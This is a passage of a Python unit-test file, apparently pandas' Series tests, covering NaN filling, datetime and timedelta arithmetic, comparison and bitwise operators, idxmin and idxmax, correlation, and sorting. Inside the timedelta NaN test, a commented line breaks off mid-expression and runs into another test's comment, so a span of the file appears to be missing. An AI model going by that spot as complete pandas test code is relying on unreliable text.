3., 3., nan], x.index)\n assert_series_equal(filled, expected)\n\n def test_fillna_inplace(self):\n x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 
'c', 'd'])\n y = x.copy()\n\n y.fillna(value=0, inplace=True)\n\n expected = x.fillna(value=0)\n assert_series_equal(y, expected)\n\n def test_fillna_invalid_method(self):\n try:\n self.ts.fillna(method='ffil')\n except ValueError as inst:\n self.assertIn('ffil', str(inst))\n\n def test_ffill(self):\n ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))\n ts[2] = np.NaN\n assert_series_equal(ts.ffill(), ts.fillna(method='ffill'))\n\n def test_bfill(self):\n ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))\n ts[2] = np.NaN\n assert_series_equal(ts.bfill(), ts.fillna(method='bfill'))\n\n def test_sub_of_datetime_from_TimeSeries(self):\n from pandas.tseries.timedeltas import to_timedelta\n from datetime import datetime\n a = Timestamp(datetime(1993, 0o1, 0o7, 13, 30, 00))\n b = datetime(1993, 6, 22, 13, 30)\n a = Series([a])\n result = to_timedelta(np.abs(a - b))\n self.assertEqual(result.dtype, 'timedelta64[ns]')\n\n def test_datetime64_with_index(self):\n\n # arithmetic integer ops with an index\n s = Series(np.random.randn(5))\n expected = s-s.index.to_series()\n result = s-s.index\n assert_series_equal(result,expected)\n\n # GH 4629\n # arithmetic datetime64 ops with an index\n s = Series(date_range('20130101',periods=5),index=date_range('20130101',periods=5))\n expected = s-s.index.to_series()\n result = s-s.index\n assert_series_equal(result,expected)\n\n result = s-s.index.to_period()\n assert_series_equal(result,expected)\n\n df = DataFrame(np.random.randn(5,2),index=date_range('20130101',periods=5))\n df['date'] = Timestamp('20130102')\n df['expected'] = df['date'] - df.index.to_series()\n df['result'] = df['date'] - df.index\n assert_series_equal(df['result'],df['expected'])\n\n def test_timedelta64_nan(self):\n\n from pandas import tslib\n td = Series([timedelta(days=i) for i in range(10)])\n\n # nan ops on timedeltas\n td1 = td.copy()\n td1[0] = np.nan\n self.assertTrue(isnull(td1[0]))\n self.assertEqual(td1[0].value, tslib.iNaT)\n td1[0] = td[0]\n self.assertFalse(isnull(td1[0]))\n\n td1[1] = tslib.iNaT\n self.assertTrue(isnull(td1[1]))\n self.assertEqual(td1[1].value, tslib.iNaT)\n td1[1] = td[1]\n self.assertFalse(isnull(td1[1]))\n\n td1[2] = tslib.NaT\n self.assertTrue(isnull(td1[2]))\n self.assertEqual(td1[2].value, tslib.iNaT)\n td1[2] = td[2]\n self.assertFalse(isnull(td1[2]))\n\n # boolean setting\n # this doesn't work, not sure numpy even supports it\n #result = td[(td>np.timedelta64(timedelta(days=3))) & (td= -0.5) & (self.ts <= 0.5)\n # assert_series_equal(selector, expected)\n\n def test_operators_na_handling(self):\n from decimal import Decimal\n from datetime import date\n s = Series([Decimal('1.3'), Decimal('2.3')],\n index=[date(2012, 1, 1), date(2012, 1, 2)])\n\n result = s + s.shift(1)\n result2 = s.shift(1) + s\n self.assertTrue(isnull(result[0]))\n self.assertTrue(isnull(result2[0]))\n\n s = Series(['foo', 'bar', 'baz', np.nan])\n result = 'prefix_' + s\n expected = Series(['prefix_foo', 'prefix_bar', 'prefix_baz', np.nan])\n assert_series_equal(result, expected)\n\n result = s + '_suffix'\n expected = Series(['foo_suffix', 'bar_suffix', 'baz_suffix', np.nan])\n assert_series_equal(result, expected)\n\n def test_object_comparisons(self):\n s = Series(['a', 'b', np.nan, 'c', 'a'])\n\n result = s == 'a'\n expected = Series([True, False, False, False, True])\n assert_series_equal(result, expected)\n\n result = s < 'a'\n expected = Series([False, False, False, False, False])\n assert_series_equal(result, expected)\n\n result = s != 'a'\n 
expected = -(s == 'a')\n assert_series_equal(result, expected)\n\n def test_comparison_operators_with_nas(self):\n s = Series(bdate_range('1/1/2000', periods=10), dtype=object)\n s[::2] = np.nan\n\n # test that comparisons work\n ops = ['lt', 'le', 'gt', 'ge', 'eq', 'ne']\n for op in ops:\n val = s[5]\n\n f = getattr(operator, op)\n result = f(s, val)\n\n expected = f(s.dropna(), val).reindex(s.index)\n\n if op == 'ne':\n expected = expected.fillna(True).astype(bool)\n else:\n expected = expected.fillna(False).astype(bool)\n\n assert_series_equal(result, expected)\n\n # fffffffuuuuuuuuuuuu\n # result = f(val, s)\n # expected = f(val, s.dropna()).reindex(s.index)\n # assert_series_equal(result, expected)\n\n # boolean &, |, ^ should work with object arrays and propagate NAs\n\n ops = ['and_', 'or_', 'xor']\n mask = s.isnull()\n for bool_op in ops:\n f = getattr(operator, bool_op)\n\n filled = s.fillna(s[0])\n\n result = f(s < s[9], s > s[3])\n\n expected = f(filled < filled[9], filled > filled[3])\n expected[mask] = False\n assert_series_equal(result, expected)\n\n def test_comparison_object_numeric_nas(self):\n s = Series(np.random.randn(10), dtype=object)\n shifted = s.shift(2)\n\n ops = ['lt', 'le', 'gt', 'ge', 'eq', 'ne']\n for op in ops:\n f = getattr(operator, op)\n\n result = f(s, shifted)\n expected = f(s.astype(float), shifted.astype(float))\n assert_series_equal(result, expected)\n\n def test_comparison_invalid(self):\n\n # GH4968\n # invalid date/int comparisons\n s = Series(range(5))\n s2 = Series(date_range('20010101', periods=5))\n\n for (x, y) in [(s,s2),(s2,s)]:\n self.assertRaises(TypeError, lambda : x == y)\n self.assertRaises(TypeError, lambda : x != y)\n self.assertRaises(TypeError, lambda : x >= y)\n self.assertRaises(TypeError, lambda : x > y)\n self.assertRaises(TypeError, lambda : x < y)\n self.assertRaises(TypeError, lambda : x <= y)\n\n def test_more_na_comparisons(self):\n left = Series(['a', np.nan, 'c'])\n right = Series(['a', np.nan, 'd'])\n\n result = left == right\n expected = Series([True, False, False])\n assert_series_equal(result, expected)\n\n result = left != right\n expected = Series([False, True, True])\n assert_series_equal(result, expected)\n\n result = left == np.nan\n expected = Series([False, False, False])\n assert_series_equal(result, expected)\n\n result = left != np.nan\n expected = Series([True, True, True])\n assert_series_equal(result, expected)\n\n def test_comparison_different_length(self):\n a = Series(['a', 'b', 'c'])\n b = Series(['b', 'a'])\n self.assertRaises(ValueError, a.__lt__, b)\n\n a = Series([1, 2])\n b = Series([2, 3, 4])\n self.assertRaises(ValueError, a.__eq__, b)\n\n def test_comparison_label_based(self):\n\n # GH 4947\n # comparisons should be label based\n\n a = Series([True, False, True], list('bca'))\n b = Series([False, True, False], list('abc'))\n\n expected = Series([True, False, False], list('bca'))\n result = a & b\n assert_series_equal(result,expected)\n\n expected = Series([True, False, True], list('bca'))\n result = a | b\n assert_series_equal(result,expected)\n\n expected = Series([False, False, True], list('bca'))\n result = a ^ b\n assert_series_equal(result,expected)\n\n # rhs is bigger\n a = Series([True, False, True], list('bca'))\n b = Series([False, True, False, True], list('abcd'))\n\n expected = Series([True, False, False], list('bca'))\n result = a & b\n assert_series_equal(result,expected)\n\n expected = Series([True, False, True], list('bca'))\n result = a | b\n 
assert_series_equal(result,expected)\n\n # filling\n\n # vs empty\n result = a & Series([])\n expected = Series([False, False, False], list('bca'))\n assert_series_equal(result,expected)\n\n result = a | Series([])\n expected = Series([True, False, True], list('bca'))\n assert_series_equal(result,expected)\n\n # vs non-matching\n result = a & Series([1],['z'])\n expected = Series([False, False, False], list('bca'))\n assert_series_equal(result,expected)\n\n result = a | Series([1],['z'])\n expected = Series([True, False, True], list('bca'))\n assert_series_equal(result,expected)\n\n # identity\n # we would like s[s|e] == s to hold for any e, whether empty or not\n for e in [Series([]),Series([1],['z']),Series(['z']),Series(np.nan,b.index),Series(np.nan,a.index)]:\n result = a[a | e]\n assert_series_equal(result,a[a])\n\n # vs scalars\n index = list('bca')\n t = Series([True,False,True])\n\n for v in [True,1,2]:\n result = Series([True,False,True],index=index) | v\n expected = Series([True,True,True],index=index)\n assert_series_equal(result,expected)\n\n for v in [np.nan,'foo']:\n self.assertRaises(TypeError, lambda : t | v)\n\n for v in [False,0]:\n result = Series([True,False,True],index=index) | v\n expected = Series([True,False,True],index=index)\n assert_series_equal(result,expected)\n\n for v in [True,1]:\n result = Series([True,False,True],index=index) & v\n expected = Series([True,False,True],index=index)\n assert_series_equal(result,expected)\n\n for v in [False,0]:\n result = Series([True,False,True],index=index) & v\n expected = Series([False,False,False],index=index)\n assert_series_equal(result,expected)\n for v in [np.nan]:\n self.assertRaises(TypeError, lambda : t & v)\n\n def test_operators_bitwise(self):\n # GH 9016: support bitwise op for integer types\n index = list('bca')\n\n s_tft = Series([True, False, True], index=index)\n s_fff = Series([False, False, False], index=index)\n s_tff = Series([True, False, False], index=index)\n s_empty = Series([])\n s_0101 = Series([0,1,0,1])\n s_0123 = Series(range(4),dtype='int64')\n s_3333 = Series([3] * 4)\n s_4444 = Series([4] * 4)\n\n res = s_tft & s_empty\n expected = s_fff\n assert_series_equal(res, expected)\n\n res = s_tft | s_empty\n expected = s_tft\n assert_series_equal(res, expected)\n\n res = s_0123 & s_3333\n expected = Series(range(4),dtype='int64')\n assert_series_equal(res, expected)\n\n res = s_0123 | s_4444\n expected = Series(range(4, 8),dtype='int64')\n assert_series_equal(res, expected)\n\n s_a0b1c0 = Series([1], list('b'))\n\n res = s_tft & s_a0b1c0\n expected = s_tff\n assert_series_equal(res, expected)\n\n res = s_tft | s_a0b1c0\n expected = s_tft\n assert_series_equal(res, expected)\n\n n0 = 0\n res = s_tft & n0\n expected = s_fff\n assert_series_equal(res, expected)\n\n res = s_0123 & n0\n expected = Series([0] * 4)\n assert_series_equal(res, expected)\n\n n1 = 1\n res = s_tft & n1\n expected = s_tft\n assert_series_equal(res, expected)\n\n res = s_0123 & n1\n expected = Series([0, 1, 0, 1])\n assert_series_equal(res, expected)\n\n s_1111 = Series([1]*4, dtype='int8')\n res = s_0123 & s_1111\n expected = Series([0, 1, 0, 1], dtype='int64')\n assert_series_equal(res, expected)\n\n res = s_0123.astype(np.int16) | s_1111.astype(np.int32)\n expected = Series([1, 1, 3, 3], dtype='int32')\n assert_series_equal(res, expected)\n\n self.assertRaises(TypeError, lambda: s_1111 & 'a')\n self.assertRaises(TypeError, lambda: s_1111 & ['a','b','c','d'])\n self.assertRaises(TypeError, lambda: s_0123 & np.NaN)\n 
self.assertRaises(TypeError, lambda: s_0123 & 3.14)\n self.assertRaises(TypeError, lambda: s_0123 & [0.1, 4, 3.14, 2])\n\n # s_0123 will be all false now because of reindexing like s_tft\n assert_series_equal(s_tft & s_0123, Series([False] * 3, list('bca')))\n # s_tft will be all false now because of reindexing like s_0123\n assert_series_equal(s_0123 & s_tft, Series([False] * 4))\n assert_series_equal(s_0123 & False, Series([False] * 4))\n assert_series_equal(s_0123 ^ False, Series([False, True, True, True]))\n assert_series_equal(s_0123 & [False], Series([False] * 4))\n assert_series_equal(s_0123 & (False), Series([False] * 4))\n assert_series_equal(s_0123 & Series([False, np.NaN, False, False]), Series([False] * 4))\n\n s_ftft = Series([False, True, False, True])\n assert_series_equal(s_0123 & Series([0.1, 4, -3.14, 2]), s_ftft)\n\n s_abNd = Series(['a','b',np.NaN,'d'])\n res = s_0123 & s_abNd\n expected = s_ftft\n assert_series_equal(res, expected)\n\n def test_between(self):\n s = Series(bdate_range('1/1/2000', periods=20).asobject)\n s[::2] = np.nan\n\n result = s[s.between(s[3], s[17])]\n expected = s[3:18].dropna()\n assert_series_equal(result, expected)\n\n result = s[s.between(s[3], s[17], inclusive=False)]\n expected = s[5:16].dropna()\n assert_series_equal(result, expected)\n\n def test_setitem_na(self):\n # these induce dtype changes\n expected = Series([np.nan, 3, np.nan, 5, np.nan, 7, np.nan, 9, np.nan])\n s = Series([2, 3, 4, 5, 6, 7, 8, 9, 10])\n s[::2] = np.nan\n assert_series_equal(s, expected)\n\n # get's coerced to float, right?\n expected = Series([np.nan, 1, np.nan, 0])\n s = Series([True, True, False, False])\n s[::2] = np.nan\n assert_series_equal(s, expected)\n\n expected = Series([np.nan, np.nan, np.nan, np.nan, np.nan, 5, 6, 7, 8, 9])\n s = Series(np.arange(10))\n s[:5] = np.nan\n assert_series_equal(s, expected)\n\n def test_scalar_na_cmp_corners(self):\n s = Series([2, 3, 4, 5, 6, 7, 8, 9, 10])\n\n def tester(a, b):\n return a & b\n\n self.assertRaises(TypeError, tester, s, datetime(2005, 1, 1))\n\n s = Series([2, 3, 4, 5, 6, 7, 8, 9, datetime(2005, 1, 1)])\n s[::2] = np.nan\n\n expected = Series(True,index=s.index)\n expected[::2] = False\n assert_series_equal(tester(s, list(s)), expected)\n\n d = DataFrame({'A': s})\n # TODO: Fix this exception - needs to be fixed! 
(see GH5035)\n # (previously this was a TypeError because series returned\n # NotImplemented\n self.assertRaises(ValueError, tester, s, d)\n\n def test_idxmin(self):\n # test idxmin\n # _check_stat_op approach can not be used here because of isnull check.\n\n # add some NaNs\n self.series[5:15] = np.NaN\n\n # skipna or no\n self.assertEqual(self.series[self.series.idxmin()], self.series.min())\n self.assertTrue(isnull(self.series.idxmin(skipna=False)))\n\n # no NaNs\n nona = self.series.dropna()\n self.assertEqual(nona[nona.idxmin()], nona.min())\n self.assertEqual(nona.index.values.tolist().index(nona.idxmin()),\n nona.values.argmin())\n\n # all NaNs\n allna = self.series * nan\n self.assertTrue(isnull(allna.idxmin()))\n\n # datetime64[ns]\n from pandas import date_range\n s = Series(date_range('20130102', periods=6))\n result = s.idxmin()\n self.assertEqual(result, 0)\n\n s[0] = np.nan\n result = s.idxmin()\n self.assertEqual(result, 1)\n\n def test_idxmax(self):\n # test idxmax\n # _check_stat_op approach can not be used here because of isnull check.\n\n # add some NaNs\n self.series[5:15] = np.NaN\n\n # skipna or no\n self.assertEqual(self.series[self.series.idxmax()], self.series.max())\n self.assertTrue(isnull(self.series.idxmax(skipna=False)))\n\n # no NaNs\n nona = self.series.dropna()\n self.assertEqual(nona[nona.idxmax()], nona.max())\n self.assertEqual(nona.index.values.tolist().index(nona.idxmax()),\n nona.values.argmax())\n\n # all NaNs\n allna = self.series * nan\n self.assertTrue(isnull(allna.idxmax()))\n\n from pandas import date_range\n s = Series(date_range('20130102', periods=6))\n result = s.idxmax()\n self.assertEqual(result, 5)\n\n s[5] = np.nan\n result = s.idxmax()\n self.assertEqual(result, 4)\n\n # Float64Index\n # GH 5914\n s = pd.Series([1,2,3],[1.1,2.1,3.1])\n result = s.idxmax()\n self.assertEqual(result, 3.1)\n result = s.idxmin()\n self.assertEqual(result, 1.1)\n\n s = pd.Series(s.index, s.index)\n result = s.idxmax()\n self.assertEqual(result, 3.1)\n result = s.idxmin()\n self.assertEqual(result, 1.1)\n\n def test_ndarray_compat(self):\n\n # test numpy compat with Series as sub-class of NDFrame\n tsdf = DataFrame(np.random.randn(1000, 3), columns=['A', 'B', 'C'],\n index=date_range('1/1/2000', periods=1000))\n\n def f(x):\n return x[x.argmax()]\n result = tsdf.apply(f)\n expected = tsdf.max()\n assert_series_equal(result,expected)\n\n # .item()\n s = Series([1])\n result = s.item()\n self.assertEqual(result, 1)\n self.assertEqual(s.item(), s.iloc[0])\n\n # using an ndarray like function\n s = Series(np.random.randn(10))\n result = np.ones_like(s)\n expected = Series(1,index=range(10),dtype='float64')\n #assert_series_equal(result,expected)\n\n # ravel\n s = Series(np.random.randn(10))\n tm.assert_almost_equal(s.ravel(order='F'),s.values.ravel(order='F'))\n\n # compress\n # GH 6658\n s = Series([0,1.,-1],index=list('abc'))\n result = np.compress(s>0,s)\n assert_series_equal(result, Series([1.],index=['b']))\n\n result = np.compress(s<-1,s)\n assert_series_equal(result, Series([],dtype='float64'))\n\n def test_complexx(self):\n\n # GH4819\n # complex access for ndarray compat\n a = np.arange(5)\n b = Series(a + 4j*a)\n tm.assert_almost_equal(a,b.real)\n tm.assert_almost_equal(4*a,b.imag)\n\n b.real = np.arange(5)+5\n tm.assert_almost_equal(a+5,b.real)\n tm.assert_almost_equal(4*a,b.imag)\n\n def test_underlying_data_conversion(self):\n\n # GH 4080\n df = DataFrame(dict((c, [1,2,3]) for c in ['a', 'b', 'c']))\n df.set_index(['a', 'b', 'c'], inplace=True)\n s = 
Series([1], index=[(2,2,2)])\n df['val'] = 0\n df\n df['val'].update(s)\n\n expected = DataFrame(dict(a = [1,2,3], b = [1,2,3], c = [1,2,3], val = [0,1,0]))\n expected.set_index(['a', 'b', 'c'], inplace=True)\n tm.assert_frame_equal(df,expected)\n\n # GH 3970\n # these are chained assignments as well\n pd.set_option('chained_assignment',None)\n df = DataFrame({ \"aa\":range(5), \"bb\":[2.2]*5})\n df[\"cc\"] = 0.0\n ck = [True]*len(df)\n df[\"bb\"].iloc[0] = .13\n df_tmp = df.iloc[ck]\n df[\"bb\"].iloc[0] = .15\n self.assertEqual(df['bb'].iloc[0], 0.15)\n pd.set_option('chained_assignment','raise')\n\n # GH 3217\n df = DataFrame(dict(a = [1,3], b = [np.nan, 2]))\n df['c'] = np.nan\n df['c'].update(pd.Series(['foo'],index=[0]))\n\n expected = DataFrame(dict(a = [1,3], b = [np.nan, 2], c = ['foo',np.nan]))\n tm.assert_frame_equal(df,expected)\n\n def test_operators_corner(self):\n series = self.ts\n\n empty = Series([], index=Index([]))\n\n result = series + empty\n self.assertTrue(np.isnan(result).all())\n\n result = empty + Series([], index=Index([]))\n self.assertEqual(len(result), 0)\n\n # TODO: this returned NotImplemented earlier, what to do?\n # deltas = Series([timedelta(1)] * 5, index=np.arange(5))\n # sub_deltas = deltas[::2]\n # deltas5 = deltas * 5\n # deltas = deltas + sub_deltas\n\n # float + int\n int_ts = self.ts.astype(int)[:-5]\n added = self.ts + int_ts\n expected = self.ts.values[:-5] + int_ts.values\n self.assert_numpy_array_equal(added[:-5], expected)\n\n def test_operators_reverse_object(self):\n # GH 56\n arr = Series(np.random.randn(10), index=np.arange(10),\n dtype=object)\n\n def _check_op(arr, op):\n result = op(1., arr)\n expected = op(1., arr.astype(float))\n assert_series_equal(result.astype(float), expected)\n\n _check_op(arr, operator.add)\n _check_op(arr, operator.sub)\n _check_op(arr, operator.mul)\n _check_op(arr, operator.truediv)\n _check_op(arr, operator.floordiv)\n\n def test_series_frame_radd_bug(self):\n import operator\n\n # GH 353\n vals = Series(tm.rands_array(5, 10))\n result = 'foo_' + vals\n expected = vals.map(lambda x: 'foo_' + x)\n assert_series_equal(result, expected)\n\n frame = DataFrame({'vals': vals})\n result = 'foo_' + frame\n expected = DataFrame({'vals': vals.map(lambda x: 'foo_' + x)})\n tm.assert_frame_equal(result, expected)\n\n # really raise this time\n self.assertRaises(TypeError, operator.add, datetime.now(), self.ts)\n\n def test_operators_frame(self):\n # rpow does not work with DataFrame\n df = DataFrame({'A': self.ts})\n\n tm.assert_almost_equal(self.ts + self.ts, (self.ts + df)['A'])\n tm.assert_almost_equal(self.ts ** self.ts, (self.ts ** df)['A'])\n tm.assert_almost_equal(self.ts < self.ts, (self.ts < df)['A'])\n tm.assert_almost_equal(self.ts / self.ts, (self.ts / df)['A'])\n\n def test_operators_combine(self):\n def _check_fill(meth, op, a, b, fill_value=0):\n exp_index = a.index.union(b.index)\n a = a.reindex(exp_index)\n b = b.reindex(exp_index)\n\n amask = isnull(a)\n bmask = isnull(b)\n\n exp_values = []\n for i in range(len(exp_index)):\n if amask[i]:\n if bmask[i]:\n exp_values.append(nan)\n continue\n exp_values.append(op(fill_value, b[i]))\n elif bmask[i]:\n if amask[i]:\n exp_values.append(nan)\n continue\n exp_values.append(op(a[i], fill_value))\n else:\n exp_values.append(op(a[i], b[i]))\n\n result = meth(a, b, fill_value=fill_value)\n expected = Series(exp_values, exp_index)\n assert_series_equal(result, expected)\n\n a = Series([nan, 1., 2., 3., nan], index=np.arange(5))\n b = Series([nan, 1, nan, 3, nan, 
4.], index=np.arange(6))\n\n pairings = []\n for op in ['add', 'sub', 'mul', 'pow', 'truediv', 'floordiv']:\n fv = 0\n lop = getattr(Series, op)\n lequiv = getattr(operator, op)\n rop = getattr(Series, 'r' + op)\n # bind op at definition time...\n requiv = lambda x, y, op=op: getattr(operator, op)(y, x)\n pairings.append((lop, lequiv, fv))\n pairings.append((rop, requiv, fv))\n\n if compat.PY3:\n pairings.append((Series.div, operator.truediv, 1))\n pairings.append((Series.rdiv, lambda x, y: operator.truediv(y, x), 1))\n else:\n pairings.append((Series.div, operator.div, 1))\n pairings.append((Series.rdiv, lambda x, y: operator.div(y, x), 1))\n\n for op, equiv_op, fv in pairings:\n result = op(a, b)\n exp = equiv_op(a, b)\n assert_series_equal(result, exp)\n _check_fill(op, equiv_op, a, b, fill_value=fv)\n # should accept axis=0 or axis='rows'\n op(a, b, axis=0)\n\n def test_combine_first(self):\n values = tm.makeIntIndex(20).values.astype(float)\n series = Series(values, index=tm.makeIntIndex(20))\n\n series_copy = series * 2\n series_copy[::2] = np.NaN\n\n # nothing used from the input\n combined = series.combine_first(series_copy)\n\n self.assert_numpy_array_equal(combined, series)\n\n # Holes filled from input\n combined = series_copy.combine_first(series)\n self.assertTrue(np.isfinite(combined).all())\n\n self.assert_numpy_array_equal(combined[::2], series[::2])\n self.assert_numpy_array_equal(combined[1::2], series_copy[1::2])\n\n # mixed types\n index = tm.makeStringIndex(20)\n floats = Series(tm.randn(20), index=index)\n strings = Series(tm.makeStringIndex(10), index=index[::2])\n\n combined = strings.combine_first(floats)\n\n tm.assert_dict_equal(strings, combined, compare_keys=False)\n tm.assert_dict_equal(floats[1::2], combined, compare_keys=False)\n\n # corner case\n s = Series([1., 2, 3], index=[0, 1, 2])\n result = s.combine_first(Series([], index=[]))\n assert_series_equal(s, result)\n\n def test_update(self):\n s = Series([1.5, nan, 3., 4., nan])\n s2 = Series([nan, 3.5, nan, 5.])\n s.update(s2)\n\n expected = Series([1.5, 3.5, 3., 5., np.nan])\n assert_series_equal(s, expected)\n\n # GH 3217\n df = DataFrame([{\"a\": 1}, {\"a\": 3, \"b\": 2}])\n df['c'] = np.nan\n\n # this will fail as long as series is a sub-class of ndarray\n # df['c'].update(Series(['foo'],index=[0])) #####\n\n def test_corr(self):\n tm._skip_if_no_scipy()\n\n import scipy.stats as stats\n\n # full overlap\n self.assertAlmostEqual(self.ts.corr(self.ts), 1)\n\n # partial overlap\n self.assertAlmostEqual(self.ts[:15].corr(self.ts[5:]), 1)\n\n self.assertTrue(isnull(self.ts[:15].corr(self.ts[5:], min_periods=12)))\n\n ts1 = self.ts[:15].reindex(self.ts.index)\n ts2 = self.ts[5:].reindex(self.ts.index)\n self.assertTrue(isnull(ts1.corr(ts2, min_periods=12)))\n\n # No overlap\n self.assertTrue(np.isnan(self.ts[::2].corr(self.ts[1::2])))\n\n # all NA\n cp = self.ts[:10].copy()\n cp[:] = np.nan\n self.assertTrue(isnull(cp.corr(cp)))\n\n A = tm.makeTimeSeries()\n B = tm.makeTimeSeries()\n result = A.corr(B)\n expected, _ = stats.pearsonr(A, B)\n self.assertAlmostEqual(result, expected)\n\n def test_corr_rank(self):\n tm._skip_if_no_scipy()\n\n import scipy\n import scipy.stats as stats\n\n # kendall and spearman\n A = tm.makeTimeSeries()\n B = tm.makeTimeSeries()\n A[-5:] = A[:5]\n result = A.corr(B, method='kendall')\n expected = stats.kendalltau(A, B)[0]\n self.assertAlmostEqual(result, expected)\n\n result = A.corr(B, method='spearman')\n expected = stats.spearmanr(A, B)[0]\n self.assertAlmostEqual(result, 
expected)\n\n # these methods got rewritten in 0.8\n if scipy.__version__ < LooseVersion('0.9'):\n raise nose.SkipTest(\"skipping corr rank because of scipy version \"\n \"{0}\".format(scipy.__version__))\n\n # results from R\n A = Series([-0.89926396, 0.94209606, -1.03289164, -0.95445587,\n 0.76910310, -0.06430576, -2.09704447, 0.40660407,\n -0.89926396, 0.94209606])\n B = Series([-1.01270225, -0.62210117, -1.56895827, 0.59592943,\n -0.01680292, 1.17258718, -1.06009347, -0.10222060,\n -0.89076239, 0.89372375])\n kexp = 0.4319297\n sexp = 0.5853767\n self.assertAlmostEqual(A.corr(B, method='kendall'), kexp)\n self.assertAlmostEqual(A.corr(B, method='spearman'), sexp)\n\n def test_cov(self):\n # full overlap\n self.assertAlmostEqual(self.ts.cov(self.ts), self.ts.std() ** 2)\n\n # partial overlap\n self.assertAlmostEqual(\n self.ts[:15].cov(self.ts[5:]), self.ts[5:15].std() ** 2)\n\n # No overlap\n self.assertTrue(np.isnan(self.ts[::2].cov(self.ts[1::2])))\n\n # all NA\n cp = self.ts[:10].copy()\n cp[:] = np.nan\n self.assertTrue(isnull(cp.cov(cp)))\n\n # min_periods\n self.assertTrue(isnull(self.ts[:15].cov(self.ts[5:], min_periods=12)))\n\n ts1 = self.ts[:15].reindex(self.ts.index)\n ts2 = self.ts[5:].reindex(self.ts.index)\n self.assertTrue(isnull(ts1.cov(ts2, min_periods=12)))\n\n def test_copy(self):\n ts = self.ts.copy()\n\n ts[::2] = np.NaN\n\n # Did not modify original Series\n self.assertFalse(np.isnan(self.ts[0]))\n\n def test_count(self):\n self.assertEqual(self.ts.count(), len(self.ts))\n\n self.ts[::2] = np.NaN\n\n self.assertEqual(self.ts.count(), np.isfinite(self.ts).sum())\n\n def test_dtype(self):\n\n self.assertEqual(self.ts.dtype, np.dtype('float64'))\n self.assertEqual(self.ts.dtypes, np.dtype('float64'))\n self.assertEqual(self.ts.ftype, 'float64:dense')\n self.assertEqual(self.ts.ftypes, 'float64:dense')\n assert_series_equal(self.ts.get_dtype_counts(),Series(1,['float64']))\n assert_series_equal(self.ts.get_ftype_counts(),Series(1,['float64:dense']))\n\n def test_dot(self):\n a = Series(np.random.randn(4), index=['p', 'q', 'r', 's'])\n b = DataFrame(np.random.randn(3, 4), index=['1', '2', '3'],\n columns=['p', 'q', 'r', 's']).T\n\n result = a.dot(b)\n expected = Series(np.dot(a.values, b.values),\n index=['1', '2', '3'])\n assert_series_equal(result, expected)\n\n # Check index alignment\n b2 = b.reindex(index=reversed(b.index))\n result = a.dot(b)\n assert_series_equal(result, expected)\n\n # Check ndarray argument\n result = a.dot(b.values)\n self.assertTrue(np.all(result == expected.values))\n assert_almost_equal(a.dot(b['2'].values), expected['2'])\n\n # Check series argument\n assert_almost_equal(a.dot(b['1']), expected['1'])\n assert_almost_equal(a.dot(b2['1']), expected['1'])\n\n self.assertRaises(Exception, a.dot, a.values[:3])\n self.assertRaises(ValueError, a.dot, b.T)\n\n def test_value_counts_nunique(self):\n\n # basics.rst doc example\n series = Series(np.random.randn(500))\n series[20:500] = np.nan\n series[10:20] = 5000\n result = series.nunique()\n self.assertEqual(result, 11)\n\n def test_unique(self):\n\n # 714 also, dtype=float\n s = Series([1.2345] * 100)\n s[::2] = np.nan\n result = s.unique()\n self.assertEqual(len(result), 2)\n\n s = Series([1.2345] * 100, dtype='f4')\n s[::2] = np.nan\n result = s.unique()\n self.assertEqual(len(result), 2)\n\n # NAs in object arrays #714\n s = Series(['foo'] * 100, dtype='O')\n s[::2] = np.nan\n result = s.unique()\n self.assertEqual(len(result), 2)\n\n # decision about None\n s = Series([1, 2, 3, None, None, 
None], dtype=object)\n result = s.unique()\n expected = np.array([1, 2, 3, None], dtype=object)\n self.assert_numpy_array_equal(result, expected)\n\n def test_dropna_empty(self):\n s = Series([])\n self.assertEqual(len(s.dropna()), 0)\n s.dropna(inplace=True)\n self.assertEqual(len(s), 0)\n\n # invalid axis\n self.assertRaises(ValueError, s.dropna, axis=1)\n\n def test_axis_alias(self):\n s = Series([1, 2, np.nan])\n assert_series_equal(s.dropna(axis='rows'), s.dropna(axis='index'))\n self.assertEqual(s.dropna().sum('rows'), 3)\n self.assertEqual(s._get_axis_number('rows'), 0)\n self.assertEqual(s._get_axis_name('rows'), 'index')\n\n def test_drop_duplicates(self):\n s = Series([1, 2, 3, 3])\n\n result = s.duplicated()\n expected = Series([False, False, False, True])\n assert_series_equal(result, expected)\n\n result = s.duplicated(take_last=True)\n expected = Series([False, False, True, False])\n assert_series_equal(result, expected)\n\n result = s.drop_duplicates()\n expected = s[[True, True, True, False]]\n assert_series_equal(result, expected)\n sc = s.copy()\n sc.drop_duplicates(inplace=True)\n assert_series_equal(sc, expected)\n\n result = s.drop_duplicates(take_last=True)\n expected = s[[True, True, False, True]]\n assert_series_equal(result, expected)\n sc = s.copy()\n sc.drop_duplicates(take_last=True, inplace=True)\n assert_series_equal(sc, expected)\n\n def test_sort(self):\n ts = self.ts.copy()\n ts.sort()\n\n self.assert_numpy_array_equal(ts, self.ts.order())\n self.assert_numpy_array_equal(ts.index, self.ts.order().index)\n\n ts.sort(ascending=False)\n self.assert_numpy_array_equal(ts, self.ts.order(ascending=False))\n self.assert_numpy_array_equal(ts.index,\n self.ts.order(ascending=False).index)\n\n # GH 5856/5853\n # Series.sort operating on a view\n df = DataFrame(np.random.randn(10,4))\n s = df.iloc[:,0]\n def f():\n s.sort()\n self.assertRaises(ValueError, f)\n\n # test order/sort inplace\n # GH6859\n ts1 = self.ts.copy()\n ts1.sort(ascending=False)\n ts2 = self.ts.copy()\n ts2.order(ascending=False,inplace=True)\n assert_series_equal(ts1,ts2)\n\n ts1 = self.ts.copy()\n ts1 = ts1.sort(ascending=False,inplace=False)\n ts2 = self.ts.copy()\n ts2 = ts.order(ascending=False)\n assert_series_equal(ts1,ts2)\n\n def test_sort_index(self):\n import random\n\n rindex = list(self.ts.index)\n random.shuffle(rindex)\n\n random_order = self.ts.reindex(rindex)\n sorted_series = random_order.sort_index()\n assert_series_equal(sorted_series, self.ts)\n\n # descending\n sorted_series = random_order.sort_index(ascending=False)\n assert_series_equal(sorted_series,\n self.ts.reindex(self.ts.index[::-1]))\n\n def test_order(self):\n ts = self.ts.copy()\n ts[:5] = np.NaN\n vals = ts.values\n\n result = ts.order()\n self.assertTrue(np.isnan(result[-5:]).all())\n self.assert_numpy_array_equal(result[:-5], np.sort(vals[5:]))\n\n result = ts.order(na_position='first')\n self.assertTrue(np.isnan(result[:5]).all())\n 